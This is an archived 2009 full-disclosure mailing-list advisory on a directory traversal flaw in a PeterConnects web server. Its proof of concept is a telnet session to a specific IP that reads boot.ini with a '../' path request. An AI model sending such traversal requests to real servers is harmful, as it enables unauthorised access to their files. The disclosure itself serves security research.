| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 8 Apr 2009 03:06:07 -0600 From: Bugs NotHugs <bugsnothugs@...il.com> To: bugtraq <bugtraq@...urityfocus.com>, fd <full-disclosure@...ts.grok.org.uk> Subject: PeterConnects Web Server Traversal Arbitrary File Access - PeterConnects Web Server Traversal Arbitrary File Access - Description PeterConnects products use a web server that is vulnerable to classic directory traversal (hello 1987) that allows for arbitrary file access. - Product PeterConnects, Unknown Product, Unknown Version (blind external tests not so good for full disclosure) http://www.peter-connects.com/ - PoC $ telnet 205.206.231.15 80 Trying 205.206.231.15... Connected to 205.206.231.15. Escape character is '^]'. GET /../../../../boot.ini HTTP/1.0 HTTP/1.0 200 OK Content-Type: application/octet-stream Content-Length: 303 [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect multi(0)disk(0)rdisk(0)partition(4)\WINDOWS="Microsoft Windows XP Professional" /fastdetect <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> [truncated] - Solution None -- BugsNotHugs Shared Vulnerability Disclosure Account _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists